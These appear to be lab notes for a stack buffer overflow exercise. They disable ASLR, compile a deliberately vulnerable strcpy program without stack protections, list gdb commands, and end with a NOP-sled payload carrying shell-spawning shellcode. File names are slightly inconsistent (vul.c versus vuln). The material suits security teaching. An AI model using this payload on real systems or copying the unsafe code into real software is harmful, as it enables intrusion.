// taken from source https://gist.github.com/apolloclark/6cffb33f179cc9162d0a
cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c
# verify "unlimited"
http://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it
[envexec.sh]
#!/bin/sh
while getopts "dte:h?" opt ; do
case "$opt" in
h|\?)
printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
exit 0
;;
t)
tty=1
gdb=1
;;
d)
gdb=1
;;
e)
env=$OPTARG
;;
esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
if [ -n "$tty" ]; then
touch /tmp/gdb-debug-pty
exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
else
exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
fi
else
exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi
[vul.c]
#include <stdio.h>
#include <string.h>
int main (int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
# compile the code
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=4 -g vuln.c -o vuln
# clean the environment, debug
chmod +x envexec.sh
./envexec.sh -d vul
# clean the environment, execute exploit
./envexec.sh /root/vul $(python ...)
# run gdb, load a program to analyze
gdb vuln
# quit the debugger
quit
# clear the screen
ctrl + l
shell clear
# show debugging symbols, ie. code
list
list main
# show the assemlby code
disas main
# examine information
info os
info functions
info variables
# run the program, with input
run Hello
# run the overflow, seg fault
run $(python -c 'print "\x41" * 1000')
# examine memory address
x/200x ($rsp - 1010)
# OverWrite rbp
run $(python -c 'print "\x90" * 453 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x51\x51\x51\x51" * 10')